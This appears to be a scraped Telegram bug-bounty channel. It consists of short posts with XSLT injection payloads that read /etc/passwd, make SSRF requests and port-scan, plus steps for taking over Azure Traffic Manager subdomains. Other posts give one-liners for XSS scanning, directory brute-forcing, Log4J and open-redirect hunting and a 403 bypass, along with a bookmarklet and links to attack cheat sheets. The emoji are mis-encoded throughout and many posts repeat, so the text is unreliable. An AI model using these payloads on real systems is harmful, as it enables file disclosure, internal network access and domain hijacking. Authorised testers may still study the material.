πLoad Balancer Takeoverπ
Step 1: Identify .trafficmanager.net subdomains. π΅οΈββοΈ
Step 2: Use your Azure subscription to access the Traffic Manager profile. π
Step 3: Create a resource with the vulnerable *.trafficmanager.net cname. π οΈ
Step 4: Add an endpoint for redirection to your desired site. π
Step 1: Identify .trafficmanager.net subdomains. π΅οΈββοΈ
Step 2: Use your Azure subscription to access the Traffic Manager profile. π
Step 3: Create a resource with the vulnerable *.trafficmanager.net cname. π οΈ
Step 4: Add an endpoint for redirection to your desired site. π
π₯4β€2π1
πXSLT Server Side Injectionπ
(Extensible Stylesheet Language Transformations) - Part 1
The most used frameworks are: Libxslt (Gnome), Xalan (Apache) and Saxon (Saxonica).
β1.β β Read Local File: read.xsl
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:abc="https://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
β2.β β SSRF
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:abc="https://php.net/xsl" version="1.0">
<xsl:include href="https://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
OR
<esi:include src="https://10.10.10.10/data/news.xml" stylesheet="https://10.10.10.10//news_template.xsl">
</esi:include>
3. Javascript Injection
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform">
<xsl:template match="/">
<script>confirm("We're good");</script>
</xsl:template>
</xsl:stylesheet>
4. Port Scan
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:php="https://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="document('https://example.com:22')"/>
</xsl:template>
</xsl:stylesheet>
(Extensible Stylesheet Language Transformations) - Part 1
The most used frameworks are: Libxslt (Gnome), Xalan (Apache) and Saxon (Saxonica).
β1.β β Read Local File: read.xsl
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:abc="https://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
β2.β β SSRF
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:abc="https://php.net/xsl" version="1.0">
<xsl:include href="https://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
OR
<esi:include src="https://10.10.10.10/data/news.xml" stylesheet="https://10.10.10.10//news_template.xsl">
</esi:include>
3. Javascript Injection
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform">
<xsl:template match="/">
<script>confirm("We're good");</script>
</xsl:template>
</xsl:stylesheet>
4. Port Scan
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:php="https://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="document('https://example.com:22')"/>
</xsl:template>
</xsl:stylesheet>
www.php.net
PHP: XSL - Manual
π₯7π2β€1
This media is not supported in your browser
VIEW IN TELEGRAM
πFind JS Endpoints With 1-Clickπ
1. Add a Blank Bookmark on your browser.
2. Add this Regex(https://0-a.nl/jsendpoints.txt) in URL Section.
3. Now open any site and click on your bookmark!
1. Add a Blank Bookmark on your browser.
2. Add this Regex(https://0-a.nl/jsendpoints.txt) in URL Section.
3. Now open any site and click on your bookmark!
π₯9π2
This media is not supported in your browser
VIEW IN TELEGRAM
Remote Code Execution via Local File Inclusion POC by Abhishek Morla
π6π₯4
XSS Checks Made Easy π
Example: Execute XSS checks on a list of URLs with a single command.
Uncover Hidden Parameters in Seconds π΅οΈββοΈ
Example: Extract hidden parameters from URLs effortlessly.
Reveal Secrets in JavaScript Files π΅οΈββοΈ
Example: Identify sensitive data in JavaScript files like a pro.
Crush Directories with Effortless Bruteforce π
Example: Discover hidden directories and files effortlessly.
Expose Log4J Vulnerabilities with Ease π
Example: Identify Log4J vulnerabilities on the fly.
Hunt Down Sneaky Open Redirectπ―
Example: Uncover open redirects like a seasoned hunter.
Capture Screenshots in a Snap π·
Example: Capture screenshots of live websites effortlessly.
Know Your WordPress Version π
Example: Discover the WordPress version of a target website instantly.
Unearth Subdomains Containing JavaScript π
Example: Find subdomains with JavaScript files in a snap.
Bypass 403 Login Pages with Finesse πͺ
Example: Bypass 403 login pages like a pro.
Example: Execute XSS checks on a list of URLs with a single command.
One-Liner: cat urls.txt | dalfox pipe --multicast -o xss.txt
Uncover Hidden Parameters in Seconds π΅οΈββοΈ
Example: Extract hidden parameters from URLs effortlessly.
ONE LINER:
cat alive.txt |rush curl -skl β{}β |grep βtype\=\βhidden\ββ |grep -Eo βname\=\β[^\β]+\ββ |cut -dβ\ββ -f2 | sort -uβ | anew params.txt
Reveal Secrets in JavaScript Files π΅οΈββοΈ
Example: Identify sensitive data in JavaScript files like a pro.
One-Liner:
cat alive.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder
Crush Directories with Effortless Bruteforce π
Example: Discover hidden directories and files effortlessly.
One-Liner:
cat alive.txt | xargs -I@ sh -c 'ffuf -c -w /path/to/wordlist -D -e php,aspx,html,do,ashx -u @/FUZZ -ac -t 200' | tee -a dir-ffuf.txt
Expose Log4J Vulnerabilities with Ease π
Example: Identify Log4J vulnerabilities on the fly.
One-Liner:
cat alive.txt | xargs -I@ sh -c 'python3 /path/to/log4j-scan.py -u @"
Hunt Down Sneaky Open Redirectπ―
Example: Uncover open redirects like a seasoned hunter.
One-Liner:
gau https://vuln.target.com | gf redirect | qsreplace β$LHOSTβ | xargs -I % -P 25 sh -c βcurl -Is β%β 2>&1 | grep -q βLocation: $LHOSTβ && echo βVULN! %ββ
Capture Screenshots in a Snap π·
Example: Capture screenshots of live websites effortlessly.
One-Liner:
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
Know Your WordPress Version π
Example: Discover the WordPress version of a target website instantly.
One-Liner:
curl -s 'https://target.com/readme.html' | grep 'Version'
Unearth Subdomains Containing JavaScript π
Example: Find subdomains with JavaScript files in a snap.
One-Liner:
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS
Bypass 403 Login Pages with Finesse πͺ
Example: Bypass 403 login pages like a pro.
One-Liner:
cat hosts.txt | httpx -path /login -p 80,443,8080,8443 -mc 401,403 -silent -t 300 | unfurl format %s://%d | httpx -path //login -mc 200 -t 300 -nc -silent
π6π₯3
This media is not supported in your browser
VIEW IN TELEGRAM
πFuzzing and Bypassing the AWS WAF to trigger XSSπ
πTool - https://lnkd.in/gk4-_4yw
πBlog - https://lnkd.in/g4W7eA7R
πTool - https://lnkd.in/gk4-_4yw
πBlog - https://lnkd.in/g4W7eA7R
β€4π₯2π1
Bug Bounty Checklist and Cheatsheets
WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
Authenication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf
Oauth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html
File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf
IDOR-https://notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
XSS-https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
SQLi-https://portswigger.net/web-security/sql-injection/cheat-sheet
XXE-https://link.medium.com/lprTDcXRYgb
SSRF-https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery
2FA-https://drive.google.com/file/d/11FlzxlVw4GIZ60s5v3I1S5p8kXZHExFT/view
CORS-https://0xn3va.gitbook.io/cheat-sheets/web-application/cors-misconfiguration
Business Logic Flaws-https://link.medium.com/MX5hzfESYgb
CSRF-https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery
Insecure deserialization-https://thehackerish.com/insecure-deserialization-explained-with-examples/
Web Cache Poisoning-https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning
HTTP request smuggling-https://portswigger.net/web-security/request-smuggling/finding
Command Injection-https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
SAML-https://github.com/e11i0t4lders0n/SAML-SSO
Race Condition-https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html
S3 Bucket Misconfiguration-https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007
Server-Side Template Injection-https://portswigger.net/research/server-side-template-injection
WebSockets Vulnerabilities-https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages
WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
Authenication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf
Oauth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html
File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf
IDOR-https://notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
XSS-https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
SQLi-https://portswigger.net/web-security/sql-injection/cheat-sheet
XXE-https://link.medium.com/lprTDcXRYgb
SSRF-https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery
2FA-https://drive.google.com/file/d/11FlzxlVw4GIZ60s5v3I1S5p8kXZHExFT/view
CORS-https://0xn3va.gitbook.io/cheat-sheets/web-application/cors-misconfiguration
Business Logic Flaws-https://link.medium.com/MX5hzfESYgb
CSRF-https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery
Insecure deserialization-https://thehackerish.com/insecure-deserialization-explained-with-examples/
Web Cache Poisoning-https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning
HTTP request smuggling-https://portswigger.net/web-security/request-smuggling/finding
Command Injection-https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
SAML-https://github.com/e11i0t4lders0n/SAML-SSO
Race Condition-https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html
S3 Bucket Misconfiguration-https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007
Server-Side Template Injection-https://portswigger.net/research/server-side-template-injection
WebSockets Vulnerabilities-https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages
π10π₯4β€3
πFind Waybackurls JS Endpoints With 1-Clickπ
1. Add a Blank Bookmark on your browser.
2. Add this Regex in URL Section.
3. Now open any site and click on your bookmark!
1. Add a Blank Bookmark on your browser.
2. Add this Regex in URL Section.
javascript:(function() { var currentURL = encodeURIComponent(window.location.hostname.replace(/^www\./, '')); var newURL = 'https://web.archive.org/cdx/search/cdx?url=%27 + currentURL; window.open(newURL, %27_blank%27);})();3. Now open any site and click on your bookmark!
β€13π₯3π1
π FREE Exam Voucher ISC2 CC π
β Exam Voucher:CC1M12312024
β Link https://www.isc2.org/landing/1mcc
β Exam Voucher:
β Link https://www.isc2.org/landing/1mcc
β€5
π¨Subproberπ¨
πSubprober is a powerful and efficient subdomain scanning toolπ
π₯ https://github.com/sanjai-AK47/Subprober
πSubprober is a powerful and efficient subdomain scanning toolπ
π₯ https://github.com/sanjai-AK47/Subprober
π7π₯2